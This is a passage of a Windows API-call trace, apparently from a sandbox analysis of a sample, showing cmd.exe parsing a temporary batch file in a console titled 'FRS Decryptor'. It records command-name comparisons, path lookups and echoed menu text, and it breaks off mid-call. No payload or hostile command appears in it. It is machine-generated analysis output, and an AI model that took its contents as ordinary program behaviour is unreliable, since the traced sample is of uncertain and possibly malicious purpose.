[0068.934] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.934] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.934] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.934] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.934] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.934] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.934] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.934] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.934] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.934] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.934] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.934] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.934] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.934] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.934] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.934] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.934] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.934] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.935] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.935] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.935] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.935] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.935] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.935] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.935] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.935] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.935] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.935] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.935] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.935] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.935] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.935] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.935] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.935] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.935] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.935] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.935] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.935] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.935] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.935] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.935] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.935] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.935] SetErrorMode (uMode=0x0) returned 0x0 [0068.935] SetErrorMode (uMode=0x1) returned 0x0 [0068.935] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.935] SetErrorMode (uMode=0x0) returned 0x1 [0068.935] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.935] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.935] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.935] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.936] GetLastError () returned 0x2 [0068.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.936] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.936] GetLastError () returned 0x2 [0068.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.936] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.936] GetLastError () returned 0x2 [0068.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.936] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.936] GetLastError () returned 0x2 [0068.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.936] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.937] GetLastError () returned 0x2 [0068.937] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.938] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.938] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.938] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.938] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.938] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.938] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.938] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.938] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.938] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.938] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.938] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.938] GetFileType (hFile=0xc) returned 0x2 [0068.938] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.938] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.938] _get_osfhandle (_FileHandle=1) returned 0xc [0068.938] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2c) returned 1 [0068.939] _get_osfhandle (_FileHandle=1) returned 0xc [0068.939] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.939] _get_osfhandle (_FileHandle=1) returned 0xc [0068.939] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.940] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.940] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.940] SetConsoleInputExeNameW () returned 0x1 [0068.940] GetConsoleOutputCP () returned 0x1b5 [0068.940] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.940] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.941] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.941] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.941] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.941] SetFilePointer (in: hFile=0xa0, lDistanceToMove=582, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0068.941] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x246 [0068.941] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1baf, lpOverlapped=0x0) returned 1 [0068.941] SetFilePointer (in: hFile=0xa0, lDistanceToMove=589, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24d [0068.941] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=7, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.\r\n ╤í╘±─·╡─╙∩╤╘: Select your language: \r\n____________________________________________________\r\n") returned 7 [0068.941] GetFileType (hFile=0xa0) returned 0x1 [0068.941] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.941] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24d [0068.941] _tell (_FileHandle=3) returned 589 [0068.941] _close (_FileHandle=3) returned 0 [0068.941] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.941] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.941] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.941] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.941] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.941] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.942] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.942] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.942] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.942] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.942] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.942] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.942] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.942] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.942] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.942] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.942] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.942] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.942] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.942] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.942] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.942] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.942] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.943] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.943] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.943] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.943] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.943] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.943] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.943] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.943] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.943] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.943] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.943] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.943] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.943] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.943] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.943] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.943] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.943] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.943] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.943] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.943] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.943] SetErrorMode (uMode=0x0) returned 0x0 [0068.943] SetErrorMode (uMode=0x1) returned 0x0 [0068.943] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.943] SetErrorMode (uMode=0x0) returned 0x1 [0068.944] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.944] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.944] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.944] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.944] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.944] GetLastError () returned 0x2 [0068.944] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.944] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.944] GetLastError () returned 0x2 [0068.944] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.944] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.944] GetLastError () returned 0x2 [0068.944] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.944] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.945] GetLastError () returned 0x2 [0068.945] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.945] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.946] GetLastError () returned 0x2 [0068.946] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.946] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.946] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.946] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.946] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.946] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.946] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.946] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.946] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.946] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.946] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.946] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.946] GetFileType (hFile=0xc) returned 0x2 [0068.946] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.946] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.947] _get_osfhandle (_FileHandle=1) returned 0xc [0068.947] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0x2) returned 1 [0068.947] _get_osfhandle (_FileHandle=1) returned 0xc [0068.947] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.947] _get_osfhandle (_FileHandle=1) returned 0xc [0068.947] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.948] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.948] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.948] SetConsoleInputExeNameW () returned 0x1 [0068.948] GetConsoleOutputCP () returned 0x1b5 [0068.948] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.948] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.949] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0068.949] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0068.949] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.949] SetFilePointer (in: hFile=0xa0, lDistanceToMove=589, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24d [0068.949] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24d [0068.949] ReadFile (in: hFile=0xa0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1ba8, lpOverlapped=0x0) returned 1 [0068.949] SetFilePointer (in: hFile=0xa0, lDistanceToMove=609, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0068.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=20, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo. [1] ╓╨╬─\r\n╘: Select your language: \r\n____________________________________________________\r\n") returned 20 [0068.949] GetFileType (hFile=0xa0) returned 0x1 [0068.949] _get_osfhandle (_FileHandle=3) returned 0xa0 [0068.949] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x261 [0068.949] _tell (_FileHandle=3) returned 609 [0068.949] _close (_FileHandle=3) returned 0 [0068.949] _wcsicmp (_String1="echo.", _String2="DIR") returned 1 [0068.949] _wcsicmp (_String1="echo.", _String2="ERASE") returned -15 [0068.949] _wcsicmp (_String1="echo.", _String2="DEL") returned 1 [0068.949] _wcsicmp (_String1="echo.", _String2="TYPE") returned -15 [0068.949] _wcsicmp (_String1="echo.", _String2="COPY") returned 2 [0068.949] _wcsicmp (_String1="echo.", _String2="CD") returned 2 [0068.950] _wcsicmp (_String1="echo.", _String2="CHDIR") returned 2 [0068.950] _wcsicmp (_String1="echo.", _String2="RENAME") returned -13 [0068.950] _wcsicmp (_String1="echo.", _String2="REN") returned -13 [0068.950] _wcsicmp (_String1="echo.", _String2="ECHO") returned 46 [0068.950] _wcsicmp (_String1="echo.", _String2="SET") returned -14 [0068.950] _wcsicmp (_String1="echo.", _String2="PAUSE") returned -11 [0068.950] _wcsicmp (_String1="echo.", _String2="DATE") returned 1 [0068.950] _wcsicmp (_String1="echo.", _String2="TIME") returned -15 [0068.950] _wcsicmp (_String1="echo.", _String2="PROMPT") returned -11 [0068.950] _wcsicmp (_String1="echo.", _String2="MD") returned -8 [0068.950] _wcsicmp (_String1="echo.", _String2="MKDIR") returned -8 [0068.950] _wcsicmp (_String1="echo.", _String2="RD") returned -13 [0068.950] _wcsicmp (_String1="echo.", _String2="RMDIR") returned -13 [0068.950] _wcsicmp (_String1="echo.", _String2="PATH") returned -11 [0068.950] _wcsicmp (_String1="echo.", _String2="GOTO") returned -2 [0068.950] _wcsicmp (_String1="echo.", _String2="SHIFT") returned -14 [0068.950] _wcsicmp (_String1="echo.", _String2="CLS") returned 2 [0068.950] _wcsicmp (_String1="echo.", _String2="CALL") returned 2 [0068.950] _wcsicmp (_String1="echo.", _String2="VERIFY") returned -17 [0068.950] _wcsicmp (_String1="echo.", _String2="VER") returned -17 [0068.950] _wcsicmp (_String1="echo.", _String2="VOL") returned -17 [0068.950] _wcsicmp (_String1="echo.", _String2="EXIT") returned -21 [0068.950] _wcsicmp (_String1="echo.", _String2="SETLOCAL") returned -14 [0068.950] _wcsicmp (_String1="echo.", _String2="ENDLOCAL") returned -11 [0068.950] _wcsicmp (_String1="echo.", _String2="TITLE") returned -15 [0068.950] _wcsicmp (_String1="echo.", _String2="START") returned -14 [0068.950] _wcsicmp (_String1="echo.", _String2="DPATH") returned 1 [0068.950] _wcsicmp (_String1="echo.", _String2="KEYS") returned -6 [0068.950] _wcsicmp (_String1="echo.", _String2="MOVE") returned -8 [0068.950] _wcsicmp (_String1="echo.", _String2="PUSHD") returned -11 [0068.950] _wcsicmp (_String1="echo.", _String2="POPD") returned -11 [0068.950] _wcsicmp (_String1="echo.", _String2="ASSOC") returned 4 [0068.950] _wcsicmp (_String1="echo.", _String2="FTYPE") returned -1 [0068.950] _wcsicmp (_String1="echo.", _String2="BREAK") returned 3 [0068.950] _wcsicmp (_String1="echo.", _String2="COLOR") returned 2 [0068.950] _wcsicmp (_String1="echo.", _String2="MKLINK") returned -8 [0068.950] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0068.950] SetErrorMode (uMode=0x0) returned 0x0 [0068.950] SetErrorMode (uMode=0x1) returned 0x0 [0068.950] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14243a0, lpFilePart=0x10eee64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10eee64*="Desktop") returned 0x1c [0068.950] SetErrorMode (uMode=0x0) returned 0x1 [0068.951] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.951] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0068.951] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.951] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.951] GetLastError () returned 0x2 [0068.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.951] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.951] GetLastError () returned 0x2 [0068.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.951] FindFirstFileExW (in: lpFileName="C:\\Windows\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.951] GetLastError () returned 0x2 [0068.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.951] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.952] GetLastError () returned 0x2 [0068.952] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.952] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\echo..*", fInfoLevelId=0x1, lpFindFileData=0x10eebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eebf0) returned 0xffffffff [0068.953] GetLastError () returned 0x2 [0068.953] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="Administrator: FRS Decryptor") returned 0x1d [0068.953] GetFileAttributesW (lpFileName="echo." (normalized: "c:\\users\\5jghkoaofdp\\desktop\\echo.")) returned 0xffffffff [0068.953] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.953] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.953] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.953] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.953] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.953] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.953] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.953] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.953] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.953] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.953] GetFileType (hFile=0xc) returned 0x2 [0068.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0068.953] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x10eebdc | out: lpMode=0x10eebdc) returned 1 [0068.954] _get_osfhandle (_FileHandle=1) returned 0xc [0068.954] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x10eebf4, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0x10eebf4*=0xf) returned 1 [0068.954] _get_osfhandle (_FileHandle=1) returned 0xc [0068.954] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.955] _get_osfhandle (_FileHandle=1) returned 0xc [0068.955] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.955] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.955] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.955] SetConsoleInputExeNameW () returned 0x1 [0068.955] GetConsoleOutputCP () returned 0x1b5 [0068.955] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.955] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.956] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: 